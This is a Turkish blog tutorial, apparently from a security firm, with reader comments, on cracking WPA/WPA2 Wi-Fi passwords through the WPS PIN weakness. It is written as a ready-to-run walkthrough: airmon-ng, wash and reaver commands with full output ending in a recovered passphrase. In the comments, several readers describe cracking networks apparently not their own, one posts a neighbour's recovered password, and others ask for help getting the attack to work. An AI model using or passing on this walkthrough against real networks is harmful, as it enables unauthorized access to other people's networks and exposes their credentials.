WPS Destekli Kablosuz Ağların WPA/WPA2 Parolasını Kırmak
WPS (Wi-Fi Protected Setup) teknolojisi, kablosuz ağın güvenlik ayarlarını kolayca ayarlamak için kullanılan esnek bir teknolojidir.
Kablosuz ağ cihazını yapılandırırken, üzerinde bulunan PIN numarası ile cihazın yapılandırılmasını sağlar.
Saldırgan, WPS’de bulunan güvenlik zaafiyeti ile bu PIN numarasını tahmin ederse WPA/WPA2 anahtarını ele geçirebilir. WPA/WPA2 anahtarı ne kadar karmaşık ve uzun olursa olsun, PIN numarası tahmin edildiğinde anahtar elde edilebilir.
Örnek Uygulama
Bu işlemleri yapmak için, ağ kartının monitor modu desteklemesi lazım.
Kablosuz ağ kartınız monitor modu destekliyor mu, bu nu görmek için şu yazıdan faydalanabilirsiniz.
http://blog.bga.com.tr/beyaz-sapkali-hackerceh/wireless-kartim-packet-injection-destekliyor-mu
# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!PID Name
976 dhclient3
2077 dhclient
2134 dhclient3
Process with PID 2134 (dhclient3) is running on interface wlan0Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb – [phy0]
(monitor mode enabled on mon0)
WPS destekli kablosuz ağları bulmak için,
# wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
00:88:11:66:99:11 1 -69 1.0 No ANGARA
00:22:6B:F1:33:2E 9 -39 1.0 No BGA
88:FF:11:99:77:33 11 -56 1.0 No SECLABS_Network
00:22:66:11:49:AA 11 -72 1.0 No BGAKADEMIS
I
Hedefimizde “BGA” kablosuz ağı var, bu cihazın BSSID değerini ve yayın yaptığı kanal numarasını not edelim.
BSSID = 33:22:55:22:11:2F
CH = 9
# reaver -i mon0 -b 33:22:55:22:11:2F -c 9 -vv –no-nack -d 5 -f -x298
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>[+] Switching mon0 to channel 9
[+] Waiting for beacon from 33:22:55:22:11:2F
[+] Associated with 33:22:55:22:11:2F (ESSID: BGA)
[+] Trying pin 47128211
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ‘47128211’
[+] WPA PSK: ‘benimgizliparolam876!#’
[+] AP SSID: ‘BGA’
[+] Nothing done, nothing to save.
Modemin WPS özelliği kapalıda olsa, saldırı başarılı olabiliyor. Teorik olarak WPS PIN numarasını tespit etmek maksimum 10 saat sürüyor, pratikte bazı özel durumlarda hedef kablosuz ağa bağlantılar zaman aşımına uğrayabilir ve bu zaman uzayabilir.
Yazar:
Ozan UÇAR
[email protected]
Sonuç alamadım arkadaşlar , sürekli tekrar aynı şeyi yazıp yazıp başa dönüyor… Sizce nedeni nedir ?… Kolay Gelsin …
Bunun için elinde sağlam bir wordlist olması gerekmektedir.
Sanırım bu işlem wep cracking için uygulanan yöntemin bir benzeri mantık olarak .
Sunucular bulunur paket veri görüntülenir ve paketler üzerinden şifreye ulaşılmaya çalışılır. Belki araya paket çekme işlemini hızlandırabilecek bir kod eklenebilir
Teşekkür ederim güzel paylaşım
Reaver, PIN numaralarını kendi oluşturuyor ek olarak wordlist’e gerek yok. Herşey yolunda giderse, en fazla 10 saat içinde parola elde edilebilir.
söyledigin gibi taratma yaptım ve 2 modem buldup birinin pin numarası kapalıydi digeri açıktı, ve açık olana atack yaptım. ilk başlarda %0.11- %0.55 % 1.00 fln diye çoook yavaş çalıştıgını gördüm .biraz sabır ettim. 😀 gece pc uyku moduna alıp ertesi gün açıp devam ettim. % 5.00 dayken. atıştırmak için odadan ayrıldım. döndügümde % 90.00 daydı 😀 dedim herhalde bozuk ve sonuç alamıycam. derken pat pin kodunu buldu ve şifreyide verdi 😀 ve şifreyi başka bir yol ile bulmaya kalksam emin olun ömrüm yetmezdi şifre : yasin763128519055258busra, insafsız ya 😀 kendi unutsa bulamaz şifreyi 😀 , şimdi benim sorum. 2 ci bir modem var. pin atack yapmama müsait açık ama bir türlü atack düzgün işlemiyor. daha ilk pin numarasında takılıyor ve tekrarlıyor. sonuç başarırız oluyor. yaklaşık 4 saat başarısız olduktan sonra tekrar deniiym dedim. bu sefer pin numaralarını deniyor. , bunun sebebi nedir ? modemin sinyal gücü % 60 fln
bu kodları uygulayabilecegimiz blacktrack dışında hangi programlar var .. yani bu dedıgını yapabilecegimiz boyut olarak en küçük program nedir ?
wps koruması aktif olanlarda kesin sonuç veriyor bazı durumlarda uzun sürebiliyor benim makine yaklaşık 36 saat açık kaldı yarıda bırakıp devmda edebilirsiniz bol şans 😀
Yakın zaman gerçekleştirdiğim bir pentest çalışmasında, 9 saat 48 dakika sonra kırdı. %96 da PIN numarasını tahmin edebildi.
Normal şartlarda tüm olasılıkları denemek 10 saat sürüyor fakat arada sinyal kesintileri, modemden yanıtların geç dönmesi süreyi uzatabilir.
@ozan
Backtrack bir program değil, bir linux dağıtımı yani başlı başına bir iştelim sistemi. Reaver diğer linux dağıtımlarında da çalışıyor alternatif farklı bir yazılım bilmiyorum.
ilk denememde 26 saat gibi bi surede buyöntemle sonuca ulaştım . ama buseferki 7 sn de pin numarsını bulmasına ragmen şifre kısmında koca bir soru işareti çıkıyor. iyi bir tahmini olan varmıdır .
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 00:21:6C:F1:83:14
[+] Associated with 00:21:6C:F1:83:14 (ESSID: Sabit)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 7 seconds
[+] WPS PIN: ‘12345670’
[+] WPA PSK: ‘�
‘
[+] AP SSID: ‘Sabit’
[+] Nothing done, nothing to save.
Özel bir karakter gelmiyorsa, elde ettiğiniz parola ile kablosuz ağa bağlanmayı deneyin.
Parolada, Türkçe karakter kullanılmışsa reaver parolayı yorumlayamıyor olabilir.
Geçen sene bu yöntemle bir parola kırmıştım, 28 saate yakın sürmüştü.
bu yöntemle wpa-psk şifre kırdım ama wash -ı mon0 -C yazıgımda wpa2 modemler gelmiyor neden acaba
Ya arkadaşlar bu konu ile ilgili çok uğrastım ama bir sonuc elde edemedim anlayan iyi bilen biri varsa yardımcı olabilirmi teamviewer de açabilirim yapabilecek biri gerek çok minnettar olucam yemin ediyorum reelde bulusup bir kıyak geçer borcumuzu öderiz yeterki yardım edin yahu :/